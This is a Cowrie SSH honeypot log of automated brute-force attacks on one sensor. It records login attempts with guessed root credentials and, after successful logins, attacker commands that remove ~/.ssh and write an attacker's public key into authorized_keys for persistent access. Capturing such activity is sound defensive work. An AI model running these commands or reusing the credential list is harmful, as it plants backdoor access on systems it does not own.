{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T19:52:28.765401Z","src_ip":"216.107.136.92","session":"5443b0a35825"}
{"eventid":"cowrie.login.success","username":"root","password":"dell","message":"login attempt [root/dell] succeeded","sensor":"my-vps","timestamp":"2025-09-08T19:52:28.862127Z","src_ip":"94.182.152.17","session":"dcae6113808c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T19:52:29.104754Z","src_ip":"94.182.152.17","session":"dcae6113808c"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T19:52:29.105516Z","src_ip":"94.182.152.17","session":"dcae6113808c"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T19:52:29.106708Z","src_ip":"94.182.152.17","session":"dcae6113808c"}
{"eventid":"cowrie.login.failed","username":"ctf","password":"111111","message":"login attempt [ctf/111111] failed","sensor":"my-vps","timestamp":"2025-09-08T19:52:29.198768Z","src_ip":"216.107.136.92","session":"5443b0a35825"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T19:52:29.201604Z","src_ip":"94.182.152.17","session":"dcae6113808c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T19:52:29.451401Z","src_ip":"94.182.152.17","session":"dcae6113808c"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T19:52:29.452116Z","src_ip":"94.182.152.17","session":"dcae6113808c"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T19:52:29.547747Z","src_ip":"94.182.152.17","session":"dcae6113808c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T19:52:29.548680Z","src_ip":"94.182.152.17","session":"dcae6113808c"}
{"eventid":"cowrie.session.connect","src_ip":"94.182.152.17","src_port":29394,"dst_ip":"1.2.3.4","dst_port":22,"session":"11cf649e838c","protocol":"ssh","message":"New connection: 94.182.152.17:29394 (1.2.3.4:22) [session: 11cf649e838c]","sensor":"my-vps","timestamp":"2025-09-08T19:52:29.639978Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T19:52:29.640761Z","src_ip":"94.182.152.17","session":"11cf649e838c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T19:52:29.733919Z","src_ip":"94.182.152.17","session":"11cf649e838c"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T19:52:30.146534Z","src_ip":"94.182.152.17","session":"11cf649e838c"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T19:52:30.290610Z","src_ip":"216.107.136.92","session":"5443b0a35825"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T19:52:31.241978Z","src_ip":"94.182.152.17","session":"11cf649e838c"}
{"eventid":"cowrie.session.connect","src_ip":"94.182.152.17","src_port":29396,"dst_ip":"1.2.3.4","dst_port":22,"session":"d5169ce7dd90","protocol":"ssh","message":"New connection: 94.182.152.17:29396 (1.2.3.4:22) [session: d5169ce7dd90]","sensor":"my-vps","timestamp":"2025-09-08T19:52:31.320921Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T19:52:31.321797Z","src_ip":"94.182.152.17","session":"d5169ce7dd90"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T19:52:31.407979Z","src_ip":"94.182.152.17","session":"d5169ce7dd90"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T19:52:31.795181Z","src_ip":"94.182.152.17","session":"d5169ce7dd90"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T19:52:31.883348Z","src_ip":"94.182.152.17","session":"d5169ce7dd90"}
{"eventid":"cowrie.session.closed","duration":"3.5","message":"Connection lost after 3.5 seconds","sensor":"my-vps","timestamp":"2025-09-08T19:52:31.889091Z","src_ip":"94.182.152.17","session":"dcae6113808c"}
{"eventid":"cowrie.session.connect","src_ip":"77.75.56.63","src_port":53320,"dst_ip":"1.2.3.4","dst_port":22,"session":"9d9c74c2a8ad","protocol":"ssh","message":"New connection: 77.75.56.63:53320 (1.2.3.4:22) [session: 9d9c74c2a8ad]","sensor":"my-vps","timestamp":"2025-09-08T19:54:00.331519Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T19:54:00.336664Z","src_ip":"77.75.56.63","session":"9d9c74c2a8ad"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T19:54:00.372824Z","src_ip":"77.75.56.63","session":"9d9c74c2a8ad"}
{"eventid":"cowrie.login.success","username":"root","password":"zzidc2025","message":"login attempt [root/zzidc2025] succeeded","sensor":"my-vps","timestamp":"2025-09-08T19:54:00.564062Z","src_ip":"77.75.56.63","session":"9d9c74c2a8ad"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T19:54:00.668700Z","src_ip":"77.75.56.63","session":"9d9c74c2a8ad"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T19:54:00.669449Z","src_ip":"77.75.56.63","session":"9d9c74c2a8ad"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T19:54:00.670705Z","src_ip":"77.75.56.63","session":"9d9c74c2a8ad"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T19:54:00.707802Z","src_ip":"77.75.56.63","session":"9d9c74c2a8ad"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T19:54:00.886126Z","src_ip":"77.75.56.63","session":"9d9c74c2a8ad"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T19:54:00.886858Z","src_ip":"77.75.56.63","session":"9d9c74c2a8ad"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T19:54:00.925750Z","src_ip":"77.75.56.63","session":"9d9c74c2a8ad"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T19:54:00.926711Z","src_ip":"77.75.56.63","session":"9d9c74c2a8ad"}
{"eventid":"cowrie.session.connect","src_ip":"77.75.56.63","src_port":53332,"dst_ip":"1.2.3.4","dst_port":22,"session":"6e5197c52e74","protocol":"ssh","message":"New connection: 77.75.56.63:53332 (1.2.3.4:22) [session: 6e5197c52e74]","sensor":"my-vps","timestamp":"2025-09-08T19:54:00.961357Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T19:54:00.970528Z","src_ip":"77.75.56.63","session":"6e5197c52e74"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T19:54:01.006839Z","src_ip":"77.75.56.63","session":"6e5197c52e74"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T19:54:01.252265Z","src_ip":"77.75.56.63","session":"6e5197c52e74"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T19:54:02.289887Z","src_ip":"77.75.56.63","session":"6e5197c52e74"}
{"eventid":"cowrie.session.connect","src_ip":"77.75.56.63","src_port":53334,"dst_ip":"1.2.3.4","dst_port":22,"session":"43396c6a86fb","protocol":"ssh","message":"New connection: 77.75.56.63:53334 (1.2.3.4:22) [session: 43396c6a86fb]","sensor":"my-vps","timestamp":"2025-09-08T19:54:02.326408Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T19:54:02.327232Z","src_ip":"77.75.56.63","session":"43396c6a86fb"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T19:54:02.364224Z","src_ip":"77.75.56.63","session":"43396c6a86fb"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T19:54:02.562227Z","src_ip":"77.75.56.63","session":"43396c6a86fb"}
{"eventid":"cowrie.session.closed","duration":"0.3","message":"Connection lost after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T19:54:02.627925Z","src_ip":"77.75.56.63","session":"43396c6a86fb"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T19:54:02.632516Z","src_ip":"77.75.56.63","session":"9d9c74c2a8ad"}
{"eventid":"cowrie.session.connect","src_ip":"103.206.72.2","src_port":58850,"dst_ip":"1.2.3.4","dst_port":22,"session":"005deb8d429f","protocol":"ssh","message":"New connection: 103.206.72.2:58850 (1.2.3.4:22) [session: 005deb8d429f]","sensor":"my-vps","timestamp":"2025-09-08T19:54:43.748043Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T19:54:43.751069Z","src_ip":"103.206.72.2","session":"005deb8d429f"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T19:54:43.924635Z","src_ip":"103.206.72.2","session":"005deb8d429f"}
{"eventid":"cowrie.login.failed","username":"svn","password":"svn@2025","message":"login attempt [svn/svn@2025] failed","sensor":"my-vps","timestamp":"2025-09-08T19:54:44.617817Z","src_ip":"103.206.72.2","session":"005deb8d429f"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T19:54:45.796672Z","src_ip":"103.206.72.2","session":"005deb8d429f"}
{"eventid":"cowrie.session.connect","src_ip":"216.107.136.92","src_port":56612,"dst_ip":"1.2.3.4","dst_port":22,"session":"ce437e84afa1","protocol":"ssh","message":"New connection: 216.107.136.92:56612 (1.2.3.4:22) [session: ce437e84afa1]","sensor":"my-vps","timestamp":"2025-09-08T19:54:59.746240Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T19:54:59.747251Z","src_ip":"216.107.136.92","session":"ce437e84afa1"}
